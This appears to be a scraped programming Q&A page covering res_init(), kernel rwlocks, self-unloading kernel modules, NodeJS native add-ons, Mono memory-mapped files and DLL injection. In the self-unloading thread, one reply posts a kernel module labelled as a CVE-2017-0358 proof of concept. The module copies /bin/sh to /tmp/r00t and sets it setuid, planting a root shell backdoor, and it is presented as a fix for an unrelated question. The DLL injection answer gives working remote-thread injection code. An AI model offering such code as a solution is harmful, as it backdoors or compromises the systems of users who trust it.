When should I call res_init() in Linux?

Poring over some old network utility code, I found a res_init() call before a getipnodebyname():
void getAddresses(string hostname, set<string> &addresses) {
    int error = 0;
    res_init();
    struct hostent *host = getipnodebyname(hostname.c_str(), AF_INET, AI_DEFAULT, &error);
    insertHostAddresses(host, addresses);
    freehostent(host);
}
Never having run into this call before, I looked up the man page:
https://linux.die.net/man/3/res_init
However, this has not exactly helped me understand when it is necessary to make this call.
I understand this is for preloading a cache? A bit of an explanation would help me out.
I should note that the current call, getaddrinfo(), does not seem to require this?

One must call res_init() if one intends to modify any of the internal resolver settings before using any of the other resolver(3) functions (directly or indirectly), e.g. to change the flags set in _res.options.
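For illustration, here is a minimal sketch of the case the man page describes (this is not from the original question; it assumes glibc's resolver and linking with -lresolv, and the specific option tweaks are just examples): load the defaults from /etc/resolv.conf with res_init(), adjust the per-process state in _res, and only then perform lookups.
#include <stdio.h>
#include <resolv.h>
#include <arpa/nameser.h>

int main(void) {
    unsigned char answer[NS_PACKETSZ];

    res_init();                 /* load defaults from /etc/resolv.conf into _res */
    _res.options |= RES_USEVC;  /* then override: query over TCP instead of UDP */
    _res.retrans = 2;           /* shorter retransmission interval (seconds) */
    _res.retry = 1;             /* and only one retry */

    /* Lookups made after this point use the modified resolver state. */
    int len = res_query("example.com", ns_c_in, ns_t_a, answer, sizeof(answer));
    printf("res_query returned %d\n", len);
    return 0;
}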

Related

Read/Write lock for Linux kernel module

I'm trying to protect a list of data using read/write locks; I found a solution in this thread:
What's the best linux kernel locking mechanism for a specific scenario
But I can't find the headers needed for this solution. It seems to be outdated; the error is:
error: ‘RW_LOCK_UNLOCKED’ undeclared here (not in a function)
I am using <linux/spinlock.h>.
RW_LOCK_UNLOCKED has been deprecated for a long time and finally removed in Linux 2.6.39, so now, according to the documentation:
For dynamic initialization, use spin_lock_init() or rwlock_init() as
appropriate:
...
For static initialization, use DEFINE_SPINLOCK() / DEFINE_RWLOCK() or
__SPIN_LOCK_UNLOCKED() / __RW_LOCK_UNLOCKED() as appropriate.
Like
static DEFINE_RWLOCK(myrwlock);
or
rwlock_t myrwlock;

/* note: don't name your own function rwlock_init(); that identifier is the kernel macro used inside */
static int __init mymodule_init(void)
{
    rwlock_init(&myrwlock);
    return 0;
}
instead of
rwlock_t myrwlock = RW_LOCK_UNLOCKED;
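To make the usage concrete, here is a small, hypothetical sketch (the names my_entry, my_list and my_list_lock are illustrative, not from the question) of guarding a linked list with such a lock: readers may run concurrently, writers get exclusive access.
#include <linux/spinlock.h>
#include <linux/list.h>

struct my_entry {
    struct list_head node;
    int value;
};

static LIST_HEAD(my_list);
static DEFINE_RWLOCK(my_list_lock);

/* Readers can run concurrently with each other. */
static int my_list_contains(int value)
{
    struct my_entry *e;
    int found = 0;

    read_lock(&my_list_lock);
    list_for_each_entry(e, &my_list, node) {
        if (e->value == value) {
            found = 1;
            break;
        }
    }
    read_unlock(&my_list_lock);
    return found;
}

/* Writers need exclusive access. */
static void my_list_add(struct my_entry *e)
{
    write_lock(&my_list_lock);
    list_add(&e->node, &my_list);
    write_unlock(&my_list_lock);
}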

How can a kernel module unload itself without generating errors in the kernel log?

I've made a simple module which prints the GDT and IDT on loading. After it's done its work, it's no longer needed and can be unloaded. But if it returns a negative number in order to stop loading, insmod will complain and an error message will be logged in the kernel log.
How can a kernel module gracefully unload itself?
As far as I can tell, it is not possible with a stock kernel (you can modify the module loader core as I describe below but that's probably not a good thing to rely on).
Okay, so I've taken a look at the module loading and unloading code (kernel/module.c) as well as several users of the very suspiciously named module_put_and_exit. It seems as though there is no kernel module which does what you'd like to do. All of them start up kthreads inside the module's context and then kill the kthread upon completion of something (they don't automatically unload the module).
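For reference, a rough, hypothetical sketch of that pattern (all names are made up, error handling is omitted, and note that this still requires an explicit rmmod afterwards -- the module merely becomes removable once the thread finishes):
#include <linux/module.h>
#include <linux/kthread.h>

static int oneshot_worker(void *unused)
{
    pr_info("doing the one-shot work\n");
    /* ... do the actual work here ... */

    /* Drop the reference taken in init and terminate this thread.
     * The module itself is NOT unloaded; it just becomes removable. */
    module_put_and_exit(0);
    return 0; /* never reached */
}

static int __init oneshot_init(void)
{
    __module_get(THIS_MODULE);  /* pin the module for the thread's lifetime */
    kthread_run(oneshot_worker, NULL, "oneshot_worker");
    return 0;
}

static void __exit oneshot_exit(void)
{
}

module_init(oneshot_init);
module_exit(oneshot_exit);
MODULE_LICENSE("GPL");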
Unfortunately, the function which does the bulk of the module unloading (free_module) is statically defined within kernel/module.c. As far as I can see, there's no exported function which will call free_module from within a module. I feel like there's probably some reason for this (it's very possible that attempting to unload a module from within itself will cause a page fault because the page which contains the module's code needs to be freed). Although this probably could be solved by making a noreturn function which just schedules after preventing the current (invalid) task from being run again (or just running do_exit).
A further point to ask is: are you sure that you want to do this? Why don't you just make a shell script to load and unload the module and call it a day? Auto-unloading modules are probably a bit too close to Skynet for my liking.
EDIT: I've played around with this a bit and have figured out a way to do this if you're okay with modifying the module loader core. Add this function to kernel/module.c, and make the necessary modifications to include/linux/module.h:
/* Removes a module in situ, from within the module itself. */
void __purge_module(struct module *mod)
{
    free_module(mod);
    do_exit(0);
    /* We should never be here. */
    BUG();
}
EXPORT_SYMBOL(__purge_module);
Calling this with __purge_module(THIS_MODULE) will unload your module and won't cause a page fault (because you don't return to the module's code). However, I would still not recommend doing this. I've done some simple volume testing (I inserted a module using this function ~10000 times to see if there were any resource leaks -- as far as I can see there aren't any).
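As an illustration only (this assumes the patched kernel above, with __purge_module declared in the modified include/linux/module.h; the module and function names here are made up), a one-shot module could then finish its init like this:
#include <linux/module.h>

static int __init dumper_init(void)
{
    pr_info("dumping GDT/IDT...\n");
    /* ... do the one-shot work ... */

    __purge_module(THIS_MODULE); /* frees this module and never returns */
    return 0;                    /* not reached */
}
module_init(dumper_init);
MODULE_LICENSE("GPL");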
Oh, you definitely can do it :)
#include <linux/module.h>
#include <linux/kmod.h>   /* for call_usermodehelper() */
MODULE_LICENSE("CC");
MODULE_AUTHOR("kristian erik hermansen <kristian.hermansen+CVE-2017-0358#gmail.com>");
MODULE_DESCRIPTION("PoC for CVE-2017-0358 from Google Project Zero");
int init_module(void) {
    char *envp[] = { "HOME=/tmp", NULL };
    char *argv[] = { "/bin/sh", "-c", "/bin/cp /bin/sh /tmp/r00t; /bin/chmod u+s /tmp/r00t", NULL };
    char *argvv[] = { "/bin/sh", "-c", "/sbin/rmmod cve_2017_0358", NULL };

    printk(KERN_INFO "[!] Exploited CVE-2017-0358 successfully; may want to patch your system!\n");
    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
    /* Have userspace rmmod this module; the module cannot safely free itself. */
    call_usermodehelper(argvv[0], argvv, envp, UMH_WAIT_EXEC);
    return 0;
}
void cleanup_module(void) {
    printk(KERN_INFO "[*] CVE-2017-0358 exploit unloading ...\n");
}

NodeJS unstable: unable to npm-install modules that need compilation

I've been working with NodeJS 0.11.x distributions for some time now, mainly because I believe that generators and the yield statement bring big advances in terms of asynchronous manageability (see coffy-script and suspend).
That said, there's a serious setback when running bleeding-edge, unstable NodeJS installs: when doing npm install xy-module, gyp will fail (always? sometimes?) when trying to compile any C components.
Is there a general reason this must be so? Is there any trick / patch / configuration I can apply to remedy the situation? If a given module does compile on NodeJS 0.10.x but fails on 0.11.x, should I expect it to compile on 0.12.x as soon as that becomes available?
Update: I cross-posted the issue on the NodeJS mailing list, and Ben Noordhuis was kind enough to share some details. Quoting his message:
The two main changes are as follows:
Persistent<T> no longer derives from Handle<T>. To recreate the
Handle from a Persistent, call Local<T>::New(isolate, persistent).
You can obtain the isolate with Isolate::GetCurrent() (but note that
Isolate::GetCurrent() will probably go away in newer versions of V8.)
The prototype of C++ callbacks and accessors has changed. Before,
your function looked like this:
Handle<Value> MyCallback(const Arguments& args) {
  HandleScope handle_scope;
  /* Do useful work, then: */
  return handle_scope.Close(Integer::New(42));
  /* Or: */
  return handle_scope.Close(String::New("hello"));
  /* Or: */
  return Null();
}
In v0.11 and v0.12 that becomes:
void MyCallback(const FunctionCallbackInfo<Value>& args) {
  Isolate* isolate = args.GetIsolate();
  HandleScope handle_scope(isolate);
  /* Do useful work, then: */
  args.GetReturnValue().Set(42);
  /* Or: */
  args.GetReturnValue().Set(String::NewFromUtf8(isolate, "hello"));
  /* Or: */
  args.GetReturnValue().SetNull();
}
There have been more changes but these two impact every native add-on.
Answered in detail in NodeUp #52: http://nodeup.com/fiftytwo
Summary: major changes in the v8 API, some minor changes in Node, and the changes are still ongoing. But there are two projects that are designed to help with the problem, NAN (github/rvagg/nan) and shim / node-addon-layer (github/tjfontaine/node-addon-layer).

Problems using MemoryMappedFile class on Mono

I'm trying to port a new version of the Isis2 library from .NET on Windows to Mono/Linux. This new code uses MemoryMappedFile objects, and I am suddenly running into issues with the Mono.Posix.Helper library. I believe that my issues would vanish if I could successfully compile and run the following test program:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.IO.MemoryMappedFiles;

namespace foobar
{
    class Program
    {
        static int CAPACITY = 100000;

        static void Main(string[] args)
        {
            MemoryMappedFile mmf = MemoryMappedFile.CreateNew("test", CAPACITY);
            MemoryMappedViewAccessor mva = mmf.CreateViewAccessor();
            for (int n = 0; n < CAPACITY; n++)
            {
                byte b = (byte)(n & 0xFF);
                mva.Write<byte>(n, ref b);
            }
        }
    }
}
... at present, when I try to compile this on Mono I get a bewildering set of linker errors: it seems unable to find libMonoPosixHelper.so, although my LD_LIBRARY_PATH includes the directory containing that file, and then if I manage to get past that stage, I get "System.NotImplementedException: The requested feature is not implemented." at runtime. Yet I've looked at the Mono implementation of the CreateNew method; it seems fully implemented, and the same is true for the CreateViewAccessor method. Thus I have a sense that something is going badly wrong when linking to the Mono libraries.
Does anyone have experience with MemoryMappedFile objects under Mono? I see quite a few questions about this kind of issue here and on other sites, but all seem to be old threads...
OK, I figured at least part of this out by inspection of the Mono code implementing this API. In fact they implemented CreateNew in a way that departs pretty drastically from the .NET API, causing these methods to behave very differently from what you would expect.
For CreateNew, they actually require that the file name you specify be the name of an existing Linux file of size at least as large as the capacity you specify, and also do some other checks for access permissions (of course), exclusive access (which is at odds with sharing...) and to make sure the capacity you requested is > 0. So if you had the file previously open, or someone else does, this will fail -- in contrast to .NET, where you explicitly use memory-mapped files for sharing.
In contrast, CreateOrOpen appears to be "more or less" correctly implemented; switching to this version seems to solve the problem. To get the effect of CreateNew, do a Delete first, wrapping it in a try/catch to catch IOException if the file doesn't exist. Then use File.WriteAllBytes to create a file with your desired content. Then call CreateOrOpen. Now this sounds dumb, but it works. Obviously you can't guarantee atomicity this way (three operations rather than one), but at least you get the desired functionality.
I can live with these restrictions as it works out, but they may surprise others, and are totally different from the .NET API definition for MemoryMappedFile.
As for my linking issues, as far as I can tell there is a situation in which Mono doesn't use the LD_LIBRARY_PATH you specify correctly and hence can't find the .so file or .dll file you used. I'll post more on this if I can precisely pin down the circumstances -- on this one, I've worked around the issue by statically linking to the library.

How to use DLL injection?

I was looking into how to inject a DLL into a program (exe, or dll, etc.). I have been googling DLL injection but I have not found anything that is very helpful :(. I have not worked with DLLs very much, so I'm not sure what to do; I really could use some help on this.
The only thing I have really found is SetWindowsHookEx, but I can't find any examples for it and I don't know how to use it. Any questions, just ask and I'll try to help.
EDIT: I was googling and this looks like something about DLL injection that is worth looking at, but I can't get the code to run :\ (How to hook external process with SetWindowsHookEx and WH_KEYBOARD)
The method I'm most familiar with was described by Jeffrey Richter in Programming Applications for Microsoft Windows. I mention this because, even if you don't get your hands on the book itself, there is probably sample code floating around, and he may also have written some MSJ / MSDN articles that are relevant. He also mentions a couple of alternative approaches, of which I will describe only one, from memory.
Anyway, the basic idea is to cause the process that you want to load your DLL to issue a call to LoadLibrary. This is done using CreateRemoteThread with the address of LoadLibrary for lpStartAddress and the address of a string naming your DLL for lpParameter. Arranging for and locating the string is done using VirtualAllocEx to allocate some memory in the remote process, and WriteProcessMemory to fill it with the string.
PSEUDO CODE:
void InjectDllIntoProcess(DWORD processId, char *dllName)
{
    // Assumes that dll and function addresses are the same in different processes
    // on the same system. I think that this is true even with ASLR; the only issue I
    // can think of is to make sure that the source and target process are both 32
    // or both 64 bit, not a mixture.
    HANDLE hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, processId);

    // Note that it is asking for the ASCII version of LoadLibrary
    HMODULE hDll = LoadLibrary(_T("Kernel32.dll"));
    void *loadLibAddr = GetProcAddress(hDll, "LoadLibraryA");

    // Inject the DLL name into the remote process's address space
    char *remoteAddr = (char *)VirtualAllocEx(hRemoteProcess, NULL, strlen(dllName) + 1,
                                              MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    WriteProcessMemory(hRemoteProcess, remoteAddr, dllName, strlen(dllName) + 1, NULL);

    // Make the remote process call LoadLibraryA(dllName)
    CreateRemoteThread(hRemoteProcess, NULL, 0,
                       (LPTHREAD_START_ROUTINE)loadLibAddr, remoteAddr, 0, NULL);
}
